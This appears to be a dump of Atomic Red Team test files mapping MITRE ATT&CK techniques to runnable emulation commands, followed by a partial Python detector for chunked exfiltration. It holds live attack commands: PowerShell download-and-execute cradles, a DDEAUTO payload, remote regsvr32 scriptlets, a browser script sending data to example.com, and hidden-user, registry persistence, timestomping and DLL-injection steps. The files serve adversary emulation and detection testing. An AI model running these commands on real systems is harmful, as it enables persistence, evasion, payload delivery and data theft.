		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x64.ActiveCfg = Release|x64
		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x64.Build.0 = Release|x64
		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x86.ActiveCfg = Release|Win32
		{8D90EA8D-EC23-4FD0-AE30-BBBA7B5A9A6F}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {12B5822E-38ED-42F2-B03F-20C2F9983559}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/tests/T1009/T1009.md:
--------------------------------------------------------------------------------
# T1009 - Binary Padding
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.

Detection: Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.

When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.

Platforms: Linux, macOS, Windows

Defense Bypassed: Anti-virus, Signature-based detection

## Atomic Tests

- [Atomic Test #1 - Pad Evil Binary to Change Hash](#atomic-test-1---pad-evil-binary-to-change-hash)


## Atomic Test #1 - Pad Evil Binary to Change Hash
Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution

**Supported Platforms:** macOS, Linux


#### Run it with `sh`!
```
cp /bin/cat /tmp/evilCat
md5sum /tmp/evilCat
dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
md5sum /tmp/evilCat
/tmp/evilCat .bash_profile
```

--------------------------------------------------------------------------------
/tests/T1077/T1077.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1077
display_name: Windows Admin Shares

atomic_tests:
- name: Map admin share
  description: |
    Connecting To Remote Shares

  supported_platforms:
  - windows

  input_arguments:
    share_name:
      description: Examples C$, IPC$, Admin$
      type: String
      default: C$
    user_name:
      description: Username
      type: String
      default: DOMAIN\Administrator
    password:
      description: Password
      type: String
      default: P@ssw0rd1
    computer_name:
      description: Target Computer Name
      type: String
      default: Target
  executor:
    name: command_prompt
    command: |
      cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"

- name: Map Admin Share PowerShell
  description: |
    Map Admin share utilizing PowerShell
  supported_platforms:
  - windows
  input_arguments:
    share_name:
      description: Examples C$, IPC$, Admin$
      type: String
      default: C$
    computer_name:
      description: Target Computer Name
      type: String
      default: Target
    map_name:
      description: Mapped Drive Letter
      type: String
      default: g
  executor:
    name: powershell
    command: |
      New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
--------------------------------------------------------------------------------
/tests/T1169/T1169.md:
--------------------------------------------------------------------------------
# T1169 - Sudo
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1169)
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware).

Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.

Detection: On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).

Platforms: Linux, macOS

Data Sources: File monitoring

Effective Permissions: root

Permissions Required: User

## Atomic Tests

- [Atomic Test #1 - Sudo usage](#atomic-test-1---sudo-usage)


## Atomic Test #1 - Sudo usage
Common Sudo enumeration methods.

**Supported Platforms:** macOS, Linux


#### Run it with `sh`!
```
sudo -l
sudo su
cat /etc/sudoers
vim /etc/sudoers
```

--------------------------------------------------------------------------------
/tests/T1063/T1063.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1063
display_name: Security Software Discovery
tactic: Discovery
description: Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.

atomic_tests:
- name: Enumerate security software
  description: |
    Methods to identify Security Software on an endpoint
    Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed)
    Security Software Discovery - powershell
    Security Software Discovery - ps

  supported_platforms:
  - windows
  - linux
  - macos

  executor_cmd:
    name: command_prompt
    command: |
      netsh.exe advfirewall firewall show all profiles
      tasklist.exe
      tasklist.exe | findstr /i virus
      tasklist.exe | findstr /i cb
      tasklist.exe | findstr /i defender
      fltmc.exe | findstr.exe 385201

  executor_pwr:
    name: powershell
    command: |
      get-process | ?{$_.Description -like "*virus*"}
      get-process | ?{$_.Description -like "*carbonblack*"}
      get-process | ?{$_.Description -like "*defender*"}

  executor_nix:
    name: sh
    command: |
      ps -ef | grep Little\ Snitch | grep -v grep
      ps aux | grep CbOsxSensorService
--------------------------------------------------------------------------------
/tests/T1087/T1087.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1087
display_name: Account Discovery
tactic: Discovery
description: Adversaries may attempt to get a listing of local system or domain accounts. Windows commands that can acquire this information are net user, net group, and net localgroup using the Net utility or through use of dsquery.

atomic_tests:
- name: Enumerate user/group accounts
  description: |
    List all accounts cmd, Powershell, Nix

  supported_platforms:
  - windows
  - linux
  - macos

  executor_cmd:
    name: command_prompt
    command: |
      net user
      cmd /r dir c:\Users\
      cmdkey.exe /list
      net localgroup "Users"
      net localgroup

  executor_pwr:
    name: powershell
    command: |
      get-localuser
      get-localgroupmember -group Users
      ls C:/Users
      get-childitem C:\Users\
      get-localgroup
      get-wmiobject -Class Win32_Computersystem | select Username

  executor_nix:
    name: nix
    command: |
      cat /etc/passwd > #{output_file}
      cat /etc/sudoers > #{output_file}
      grep 'x:0:' /etc/passwd > #{output_file}
      username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
      lastlog > #{output_file}
      groups
      id
      dscl . list /Groups
      dscl . list /Users
      dscl . list /Users | grep -v '_'
      dscacheutil -q group
      dscacheutil -q user
--------------------------------------------------------------------------------
/tests/T1183/T1183.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1183
display_name: Image File Execution Options

atomic_tests:
- name: IFEO Add Debugger
  description: |
    TODO

  supported_platforms:
  - windows
  input_arguments:
    target_binary:
      description: Binary To Attach To
      type: Path
      default: winword.exe
    payload_binary:
      description: Binary To Execute
      type: Path
      default: cmd.exe

  executor:
    name: command_prompt
    command: |
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"

- name: IFEO Global Flags
  description: |
    Leverage Global Flags Settings

  supported_platforms:
  - windows

  input_arguments:
    target_binary:
      description: Binary To Attach To
      type: Path
      default: notepad.exe
    payload_binary:
      description: Binary To Execute
      type: Path
      default: cmd.exe

  executor:
    name: command_prompt
    command: |
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
--------------------------------------------------------------------------------
/tests/T1127/src/T1127.csproj:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/tests/T1033/T1033.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1033
display_name: System Owner/User Discovery
tactic: Discovery
description: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.

atomic_tests:
- name: Enumerate system owner/user
  description: |
    Identify System owner or users on an endpoint

  supported_platforms:
  - windows
  - linux
  - macos

  executor_cmd:
    name: command_prompt
    command: |
      cmd.exe /C whoami
      wmic useraccount get #{/ALL}
      quser /SERVER:"#{computer_name}"
      quser
      qwinsta.exe /server:#{computer_name}
      qwinsta.exe
      for #{/F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt}
      @FOR #{/F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt}

  executor_nix:
    name: sh
    command: |
      users
      w
      who
--------------------------------------------------------------------------------
/tests/T1147/T1147.md:
--------------------------------------------------------------------------------
# T1147 - Hidden Users
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1147)
Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. By using the Create Account technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: sudo dscl . -create /Users/username UniqueID 401 (Citation: Cybereason OSX Pirrit).

Detection: This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.

Platforms: macOS

Data Sources: Authentication logs, File monitoring

Permissions Required: Administrator, root

## Atomic Tests

- [Atomic Test #1 - Hidden Users](#atomic-test-1---hidden-users)


## Atomic Test #1 - Hidden Users
Add a hidden user on MacOS

**Supported Platforms:** macOS


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username to add | string | APT |

#### Run it with `sh`!
```
sudo dscl . -create /Users/#{user_name} UniqueID 333
```

--------------------------------------------------------------------------------
/tests/T1163/T1163.md:
--------------------------------------------------------------------------------
# T1163 - Rc.common
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1163)
During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.

Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).

Detection: The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.

Platforms: macOS

Data Sources: File monitoring, Process Monitoring

Permissions Required: root

## Atomic Tests

- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)


## Atomic Test #1 - rc.common
Modify rc.common

[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)

**Supported Platforms:** macOS


#### Run it with `sh`!
```
echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
```

--------------------------------------------------------------------------------
/tests/T1137/T1137.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1137
display_name: Office Application Startup
tactic: Persistence
description: Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.

atomic_tests:
- name: DDEAUTO
  description: |
    TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
    SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
    Word VBA Macro
    [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)

  supported_platforms:
  - windows

  executor_man:
    name: manual
    steps: |
      1. Open Word
      2. Insert tab -> Quick Parts -> Field
      3. Choose = (Formula) and click ok.
      4. Once the field is inserted, you should now see "!Unexpected End of Formula"
      5. Right-click the Field, choose "Toggle Field Codes"
      6. Paste in the code from Unicorn or SensePost
      7. Save the Word document.
      9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
      10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # " "Microsoft Document Security Add-On"
--------------------------------------------------------------------------------
/tests/T1060/T1060.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1060
display_name: Registry Run Keys and Start Folder
tactic: Persistence
description: Adding an entry to "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. **Requires admin**

atomic_tests:
- name: Reg Key Run
  description: |
    Run/RunOnce Key Persistence

  supported_platforms:
  - windows

  input_arguments:
    command_to_execute:
      description: Thing to Run
      type: Path
      default: \HelloWorld.bat

  executor_cmd:
    name: command_prompt
    command: |
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "\mate\tests\t1060\HelloWorld.bat"
      REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /V 1 /d "\mate\tests\t1060\HelloWorld.bat" /f
      REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /V 1 /f

  executor_pwr:
    name: powershell
    command: |
      Set-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "NextRun" -Value "\mate\tests\t1060\HelloWorld.bat" -Force
      Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "NextRun" -Force
      "\mate\tests\t1060\t1060.ps1"
--------------------------------------------------------------------------------
/tests/T1176/inline.js:
--------------------------------------------------------------------------------
function exfil(str) {
    // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
    // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
    // and probably a thousand other methods. But this one is easy.
    var buffer = new TextEncoder("utf-8").encode(str);
    return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}

function callUrl(buffer) {
    // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
    // except it's example.com so w/e
    var digest = hex(buffer);
    var url = "https://example.com/" + digest;
    console.log("Exfiltrating data to " + url);
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("GET", url, true);
    xmlHttp.send(null);
    return digest;
}

function hex(buffer) {
    // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
    var hexCodes = [];
    var view = new DataView(buffer);
    for (var i = 0; i < view.byteLength; i += 4) {
        var value = view.getUint32(i);
        var stringValue = value.toString(16);
        var padding = '00000000';
        var paddedValue = (padding + stringValue).slice(-padding.length);
        hexCodes.push(paddedValue);
    }
    return hexCodes.join("");
}

// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
var digest = exfil(document.title);
--------------------------------------------------------------------------------
/tests/T1099/T1099.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1099
display_name: Timestomp

atomic_tests:
- name: Set a file's access timestamp
  description: |
    Stomps on the access timestamp of a file
  supported_platforms:
  - linux
  - macos
  input_arguments:
    target_filename:
      description: Path of file that we are going to stomp on last access time
      type: Path
  executor:
    name: sh
    command: |
      touch -a -t 197001010000.00 #{target_filename}

- name: Set a file's modification timestamp
  description: |
    Stomps on the modification timestamp of a file
  supported_platforms:
  - linux
  - macos
  input_arguments:
    target_filename:
      description: Path of file that we are going to stomp on last access time
      type: Path
  executor:
    name: sh
    command: |
      touch -m -t 197001010000.00 #{target_filename}

- name: Set a file's creation timestamp
  description: |
    Stomps on the create timestamp of a file

    Setting the creation timestamp requires changing the system clock and reverting.
    Sudo or root privileges are required to change date. Use with caution.

  supported_platforms:
  - linux
  - macos
  input_arguments:
    target_filename:
      description: Path of file that we are going to stomp on last access time
      type: Path
  executor:
    name: sh
    command: |
      NOW=$(date)
      date -s "1970-01-01 00:00:00"
      touch #{target_filename}
      date -s "$NOW"
      stat #{target_filename}
--------------------------------------------------------------------------------
/tests/T1117/T1117.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1117
display_name: Regsvr32
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
  description: |
    Regsvr32.exe is a command-line program used to register and unregister OLE controls
  supported_platforms:
  - windows
  input_arguments:
    filename:
      description: Name of the local file, include path.
      type: Path
      default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct
  executor:
    name: command_prompt
    command: |
      regsvr32.exe /s /u /i:#(unknown) scrobj.dll
- name: Regsvr32 remote COM scriptlet execution
  description: |
    Regsvr32.exe is a command-line program used to register and unregister OLE controls
  supported_platforms:
  - windows
  input_arguments:
    url:
      description: URL to hosted sct file
      type: Url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
  executor:
    name: command_prompt
    command: |
      regsvr32.exe /s /u /i:#{url} scrobj.dll
- name: Regsvr32 local DLL execution
  description: |
    Regsvr32.exe is a command-line program used to register and unregister OLE controls
  supported_platforms:
  - windows
  input_arguments:
    dll_name:
      description: Name of DLL to Execute, DLL Should export DllRegisterServer
      type: Path
      default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
  executor:
    name: command_prompt
    command: |
      "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
--------------------------------------------------------------------------------
/tests/T1050/src/AtomicService.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.ServiceProcess;

// c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe AtomicService.cs
// sc create AtomicService binPath= "C:\AtomicRedTeam\atomics\T10150\bin\AtomicService.exe"
// sc start AtomicService
// sc stop AtomicService
// sc delete AtomicService
// May require Administrator privileges


namespace AtomicService
{
    public class Service1 : System.ServiceProcess.ServiceBase
    {
        private System.ComponentModel.Container components = null;

        public Service1()
        {
            InitializeComponent();
        }

        // The main entry point for the process
        static void Main()
        {
            System.ServiceProcess.ServiceBase[] ServicesToRun;

            ServicesToRun = new System.ServiceProcess.ServiceBase[] { new AtomicService.Service1() };

            System.ServiceProcess.ServiceBase.Run(ServicesToRun);
        }

        private void InitializeComponent()
        {
            //
            // Service1
            //
            this.ServiceName = "AtomicService";
        }

        protected override void Dispose(bool disposing)
        {
            if (disposing)
            {
                if (components != null)
                {
                    components.Dispose();
                }
            }
            base.Dispose(disposing);
        }

        protected override void OnStart(string[] args)
        {
        }

        protected override void OnStop()
        {
        }

        protected override void OnContinue()
        {
        }
    }
}
--------------------------------------------------------------------------------
/tests/T1115/T1115.md:
--------------------------------------------------------------------------------
# T1115 - Clipboard Data
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.

===Windows===

Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard)

===Mac===

OSX provides a native command, pbpaste, to grab clipboard contents (Citation: Operating with EmPyre).

Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.

Platforms: Linux, macOS, Windows

Data Sources: API monitoring

## Atomic Tests

- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)

- [Atomic Test #2 - PowerShell](#atomic-test-2---powershell)


## Atomic Test #1 - Utilize Clipboard to store or execute commands from
Add data to clipboard to copy off or execute commands from.

**Supported Platforms:** Windows


#### Run it with `command_prompt`!
```
dir | clip
clip < readme.txt
```


## Atomic Test #2 - PowerShell
Utilize PowerShell to echo a command to clipboard and execute it

**Supported Platforms:** Windows


#### Run it with `powershell`!
```
echo Get-Process | clip
Get-Clipboard | iex
```

--------------------------------------------------------------------------------
/tests/T1155/T1155.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1155
display_name: AppleScript

atomic_tests:
- name: AppleScript
  description: |
    Shell Script with AppleScript

    reference

    https://github.com/EmpireProject/Empire

  supported_platforms:
  - macos

  executor:
    name: sh
    command: |
      osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &""
--------------------------------------------------------------------------------
/tests/T1105/T1105.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1105
display_name: Remote File Copy

atomic_tests:
- name: xxxx
  description: |
    xxxx
  supported_platforms:
  - linux
  - macos
  executor:
    name: bash
    command: |
      ### TODO: Not sure how to handle commands that need to be run on multiple systems

      # Adversary System Configuration
      # Ensure SSH access has been configured for an adversary account
      echo "This file transferred by scp" > /tmp/adversary-scp
      echo "This file transferred by sftp" > /tmp/adversary-sftp
      mkdir /tmp/adversary-rsync
      cd /tmp/adversary-rsync
      touch a b c d e f g

      # Victim System Configuration
      # Ensure SSH access has been configured for a victim account
      # Ensure write access for victim account to this directory
      mkdir /tmp/victim-files
      cd /tmp/victim-files

      # Push files to victim using rsync
      rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/

      # Pull files from adversary using rsync
      rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/

      # Push files to victim using scp
      scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/

      # Pull file from adversary using scp
      scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file

      # Push files to victim using sftp
      sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'

      # Pull file from adversary using sftp
      sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
--------------------------------------------------------------------------------
/tests/T1074/T1074.md:
--------------------------------------------------------------------------------
# T1074 - Data Staged
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1074)
Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted.

Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Detection: Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.

Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Platforms: Linux, macOS, Windows

Data Sources: File monitoring, Process monitoring, Process command-line parameters

## Atomic Tests

- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)


## Atomic Test #1 - Stage data from Discovery.bat
Utilize powershell to download discovery.bat and save to a local file

**Supported Platforms:** Windows


#### Run it with `powershell`!
```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
```
--------------------------------------------------------------------------------
/tests/T1202/T1202.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1202
display_name: Indirect Command Execution

atomic_tests:
- name: Indirect Command Execution - pcalua.exe
  description: |
    The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.

    [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)

  supported_platforms:
    - windows

  input_arguments:
    process:
      description: Process to execute
      type: string
      default: calc.exe
    payload_path:
      description: Path to payload
      type: path
      default: c:\temp\payload.dll
    payload_cpl_path:
      description: Path to payload
      type: path
      default: C:\Windows\system32\javacpl.cpl -c Java

  executor:
    name: command_prompt
    command: |
      pcalua.exe -a #{process}
      pcalua.exe -a #{payload_path}
      pcalua.exe -a #{payload_cpl_path}

- name: Indirect Command Execution - forfiles.exe
  description: |
    forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.

    [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)

    "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"

  supported_platforms:
    - windows

  input_arguments:
    process:
      description: Process to execute
      type: string
      default: calc.exe

  executor:
    name: command_prompt
    command: |
      forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
      forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
--------------------------------------------------------------------------------
/tests/T1218/T1218.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1218
display_name: Signed Binary Proxy Execution

atomic_tests:
- name: mavinject - Inject DLL into running process
  description: |
    Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

  supported_platforms:
    - windows

  input_arguments:
    dll_payload:
      description: DLL to inject
      type: Path
      default: C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll
    process_id:
      description: PID of process receiving injection
      type: string
      default: 1000
  executor:
    name: command_prompt
    command: |
      mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}

- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
  description: |
    Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

  supported_platforms:
    - windows

  input_arguments:
    powershell_code:
      description: PowerShell code to execute
      type: string
      default: Start-Process calc.exe
  executor:
    name: command_prompt
    command: |
      SyncAppvPublishingServer.exe "n; #{powershell_code}"

- name: Register-CimProvider - Execute evil dll
  description: |
    Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB.

  supported_platforms:
    - windows

  input_arguments:
    dll_payload:
      description: DLL to execute
      type: Path
      default: C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll
  executor:
    name: command_prompt
    command: |
      C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
--------------------------------------------------------------------------------
/tests/T1030/T1030.md:
--------------------------------------------------------------------------------
# T1030 - Data Transfer Size Limits
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)

Platforms: Linux, macOS, Windows

Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring

Requires Network: Yes

## Atomic Tests

- [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)

## Atomic Test #1 - Data Transfer Size Limits
Take a file/directory and split it into 5 MB chunks.

**Supported Platforms:** macOS, CentOS, Ubuntu, Linux

#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | TODO | todo | TODO|

#### Run it with `sh`!
```
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
split -b 5000000 /tmp/victim-whole-file
ls -l
```
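The detection text above describes a shape, not a rule: same-sized sends, at a steady cadence, with far more leaving than coming back. This added example (written for this page, not Atomic Red Team code) turns that into a check over constructed flow records; the record layout, the thresholds and the sample flows, including the 5 MB chunk size matching the test, are assumptions.

```python
"""Heuristic for ATT&CK T1030 (Data Transfer Size Limits), written for this page.

Flags a process that keeps sending same-sized chunks to one destination at a
steady cadence while receiving little back, which is how a chunked transfer
(for instance the 5 MB pieces the atomic test produces) looks in flow or
packet telemetry. The record layout and the sample flows are constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed record layout:
# (epoch_seconds, pid, process, destination, bytes_sent, bytes_received)
SAMPLE_FLOWS = [
    # pid 3321: 5 MB chunks every 30 s to one host, almost nothing coming back
    (1000, 3321, "curl", "203.0.113.10:443", 5_000_000, 400),
    (1030, 3321, "curl", "203.0.113.10:443", 5_000_000, 400),
    (1060, 3321, "curl", "203.0.113.10:443", 5_000_000, 400),
    (1090, 3321, "curl", "203.0.113.10:443", 5_000_000, 400),
    (1120, 3321, "curl", "203.0.113.10:443", 5_000_000, 400),
    # pid 4410: an ordinary browsing session, variable sizes, mostly inbound
    (1000, 4410, "firefox", "198.51.100.7:443", 1_200, 85_000),
    (1003, 4410, "firefox", "198.51.100.7:443", 9_800, 310_000),
    (1017, 4410, "firefox", "198.51.100.7:443", 640, 12_000),
    (1050, 4410, "firefox", "198.51.100.7:443", 22_000, 1_900_000),
    (1051, 4410, "firefox", "198.51.100.7:443", 3_100, 44_000),
    # pid 5150: a regular heartbeat, but tiny and symmetric, so not exfil
    (1000, 5150, "agent", "192.0.2.5:8443", 300, 280),
    (1060, 5150, "agent", "192.0.2.5:8443", 300, 280),
    (1120, 5150, "agent", "192.0.2.5:8443", 300, 280),
    (1180, 5150, "agent", "192.0.2.5:8443", 300, 280),
]


def variation(values):
    """Coefficient of variation (stdev / mean); 0.0 means perfectly uniform."""
    if len(values) < 2:
        return None
    m = mean(values)
    return pstdev(values) / m if m else None


def find_chunked_transfers(flows, min_records=4, max_size_cv=0.05,
                           max_interval_cv=0.25, min_out_in_ratio=10.0):
    """Return findings for (pid, destination) series that look like chunked exfil.

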